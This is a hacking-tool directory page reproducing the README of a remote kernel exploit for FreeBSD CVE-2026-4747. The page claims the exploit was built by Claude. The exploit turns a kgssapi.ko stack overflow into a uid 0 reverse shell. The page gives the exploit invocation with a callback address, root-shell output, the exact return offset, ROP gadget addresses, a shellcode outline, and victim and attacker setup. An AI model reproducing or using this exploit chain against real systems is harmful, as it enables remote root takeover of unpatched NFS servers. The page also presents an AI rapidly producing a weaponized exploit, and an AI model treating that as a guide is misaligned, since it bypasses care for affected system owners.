Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/kaleth4/cve-2026-4747-
Exploit FrameworksVulnerability AnalysisExploitationReverse EngineeringPayload DevelopmentBinary Exploitation
GitHubkaleth4/cve-2026-4747-

CVE-2026-4747-

Remote kernel exploit for FreeBSD CVE-2026-4747, leveraging a stack buffer overflow in kgssapi.ko to achieve RCE with a reverse shell. Includes multi-round ROP delivery and detailed setup instructions.

View Repository
1165 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-4747: FreeBSD Remote Kernel RCE

First remote kernel exploit both discovered and exploited by an AI


📋 Quick Summary

AspectDetail
CVECVE-2026-4747
VulnerabilityStack buffer overflow in kgssapi.ko (RPCSEC_GSS)
ImpactRemote Kernel Code Execution → uid 0 reverse shell
AffectedFreeBSD 13.5, 14.3, 14.4, 15.0 (unpatched versions)
Discovered byNicholas Carlini using Claude (Anthropic)
Advisory Date2026-03-26
Exploitation Time~8 hours (4 hours of actual Claude work)

🎯 Timeline

  • 2026-03-26: FreeBSD publishes advisory CVE-2026-4747
  • 9:45 AM PDT 2026-03-29: Claude is asked to develop an exploit
  • 5:00 PM PDT 2026-03-29: Claude delivers working exploit with uid 0 reverse shell

🚀 Live Demonstration

python3 exploit.py -t 127.0.0.1 --ip 10.0.2.2 --port 4444

Output:

==============================================================
  CVE-2026-4747: FreeBSD RPCSEC_GSS Remote Kernel RCE
  Stack overflow → ROP → shellcode → uid 0 reverse shell
==============================================================

  Target:   127.0.0.1:2049
  Callback: 10.0.2.2:4444
  SPN:      nfs/[email protected]

  Shellcode: 432 bytes (54 qwords)
  Delivery:  15 rounds (1 pmap + 14 write)

  [R1/15]  pmap_change_prot(BSS, 0x2000, RWX) ✓
  [R2/15]  write (4 qwords → 0xffffffff8198a800) ✓
  [R3/15]  write (4 qwords → 0xffffffff8198a820) ✓
  ...
  [R15/15] write + EXECUTE (2 qwords) → JUMP 0xffffffff8198a800 ✓

  [*] Shellcode delivered and executing
  [*] kproc_create → kern_execve('/bin/sh -c ...')
  [*] Reverse shell → 10.0.2.2:4444

  [+] Connection from 127.0.0.1:41320
  [+] Got shell!

sh: can't access tty; job control turned off
# id
uid=0(root) gid=0(wheel) groups=0(wheel)

🔍 What Did Claude Do?

Claude solved 6 distinct technical problems to go from an advisory to a working reverse shell:

1️⃣ Lab Setup

  • FreeBSD 14.4-RELEASE VM with NFS + Kerberos
  • Critical requirement: 2+ CPUs (the exploit kills 1 NFS thread per round, needs 15 rounds)
  • Remote debugging to read kernel crash dumps

2️⃣ Multi-Packet Delivery

  • 432-byte shellcode doesn't fit in 1 packet (XDR limit: 400 bytes)
  • Solution: 15 overflow rounds
    • Round 1: pmap_change_prot() → make BSS executable
    • Rounds 2-14: Write shellcode 32 bytes per round
    • Round 15: Last 16 bytes + jump to shellcode

3️⃣ Clean Thread Exit

  • Each overflow hijacks an NFS worker thread
  • Uses kthread_exit() to terminate cleanly (no kernel panic)
  • NFS server stays alive for the next round

4️⃣ Offset Debugging (De Bruijn Pattern)

  • Initial disassembly said RIP at byte 168 → INCORRECT
  • Claude sent a cyclic De Bruijn pattern
  • Read kernel crash dump → real offset: byte 200
  • 32-byte difference: GSS header + context handling

5️⃣ Kernel → Userland Transition

  • NFS threads are pure kernel threads (no vmspace, no trapframe)
  • Two-phase solution:
    • Phase 1: kproc_create() → new process with user-mode infrastructure
    • Phase 2: kern_execve("/bin/sh") → loads ELF, sets up trapframe, clears P_KPROC flag
    • Result: /bin/sh runs in ring 3 as uid 0

6️⃣ Debug Registers Mystery (DR7/DDB)

  • Worker crashed with trap 1 (debug exception) on a valid instruction
  • Cause: kproc_create() inherits debug registers from parent
  • Previous panics had enabled DDB → persistent hardware breakpoints
  • Fix: Clear DR7 before kproc_create()

🏗️ Technical Architecture

Stack Layout (Verified with De Bruijn)

Credential body byte → Stack target
[0..35]              → GSS header (version, proc, seq, svc, handle)
[36..151]            → Padding (rpchdr remainder + local vars)
[152..199]           → Saved registers (RBX, R12, R13, R14, R15, RBP)
[200..207]           → RETURN ADDRESS ← First ROP gadget
[208..399]           → ROP chain (192 bytes = 24 qwords)

ROP Gadgets (FreeBSD 14.4-RELEASE)

GadgetAddressPurpose
pop rdi; retK+0x1adcdaArg 1 (rdi)
pop rsi; retK+0x1cdf98Arg 2 (rsi)
pop rdx; retK+0x5fa429Arg 3 (rdx)
pop rax; retK+0x400cb4Value to write
mov [rdi], rax; ret0xffffffff80e3457cArbitrary 8-byte write

Where K = 0xffffffff80200000 (kernel base, no KASLR on FreeBSD 14.x)

Shellcode (432 bytes)

Phase 1 - Entry (Hijacked NFS thread):

mov rax, 0xffffffff8198bf00    ; Pivot stack to BSS
mov rsp, rax
xor eax, eax
mov dr7, rax                    ; Clear hardware breakpoints
call rbx                        ; kproc_create (preloaded in RBX)
mov rax, kthread_exit
call rax                        ; Exit thread cleanly

Phase 2 - Worker (New kernel process):

; Set up arguments for kern_execve
lea rdi, [rbp - 0x80]          ; &image_args
mov rsi, "/bin/sh"
mov edx, 1                      ; UIO_SYSSPACE
call exec_args_add_fname

; Add "-c" and reverse shell command
; ...

; Execute /bin/sh
mov rdi, gs:[0]                 ; curthread
mov rax, [rdi + 0x08]           ; proc
call kern_execve

; Clear P_KPROC flag
and byte [rax + 0xb8], 0xfb    ; Allow transition to userland
ret                             ; → fork_exit → userret → iretq → ring 3

🛠️ Target Setup

Option A: QEMU (Automated with cloud-init)

# Download image
wget https://download.freebsd.org/releases/VM-IMAGES/14.4-RELEASE/amd64/Latest/\
FreeBSD-14.4-RELEASE-amd64-BASIC-CLOUDINIT-ufs.qcow2.xz
xz -d FreeBSD-14.4-RELEASE-amd64-BASIC-CLOUDINIT-ufs.qcow2.xz
qemu-img resize FreeBSD-14.4-RELEASE-amd64-BASIC-CLOUDINIT-ufs.qcow2 8G

# Cloud-init config
cat > user-data << 'EOF'
#cloud-config
chpasswd:
  list: |
    root:freebsd
  expire: False
runcmd:
  - kldload kgssapi
  - sysrc rpcbind_enable=YES nfs_server_enable=YES
  - service rpcbind start && service nfsd start
EOF

# Boot with port forwarding
qemu-system-x86_64 -enable-kvm -m 2G -smp 2 \
  -drive file=freebsd-vuln.qcow2,format=qcow2,if=virtio \
  -netdev user,id=net0,hostfwd=tcp::2222-:22,hostfwd=tcp::2049-:2049,hostfwd=tcp::8888-:88 \
  -device virtio-net-pci,netdev=net0 -nographic

Option B: VMware / VirtualBox / bhyve (Manual)

Requirements:

  • 2+ CPUs (critical: 8 NFS threads/CPU, exploit needs 15 rounds)
  • 2GB RAM, 8GB disk
  • FreeBSD 14.4-RELEASE

VM Setup:

# 1. Install Kerberos
pkg install -y krb5

# 2. Create KDC
cat > /etc/krb5.conf << 'EOF'
[libdefaults]
    default_realm = TEST.LOCAL
[realms]
    TEST.LOCAL = {
        kdc = 127.0.0.1
        admin_server = 127.0.0.1
    }
EOF

# 3. Initialize KDC database
/usr/local/sbin/kdb5_util create -s -P masterkey -r TEST.LOCAL

# 4. Create principals (replace "test" with your hostname)
/usr/local/sbin/kadmin.local -q "addprinc -pw password [email protected]"
/usr/local/sbin/kadmin.local -q "addprinc -randkey nfs/[email protected]"
/usr/local/sbin/kadmin.local -q "ktadd -k /etc/krb5.keytab nfs/[email protected]"

# 5. Start KDC
/usr/local/sbin/krb5kdc

# 6. Configure NFS
mkdir -p /export
echo '/export -network 0.0.0.0/0' > /etc/exports

# 7. Enable services
sysrc rpcbind_enable=YES nfs_server_enable=YES gssd_enable=YES
service rpcbind start && service nfsd start

# 8. Verify
sysctl vfs.nfsd.threads        # Should show 16 (with 2 CPUs)
sockstat -l | grep 2049        # Should show tcp4/tcp6

Attacker Host Setup (Linux)

# 1. Install packages
sudo apt install krb5-user libkrb5-dev python3-gssapi
pip install gssapi
Download Tool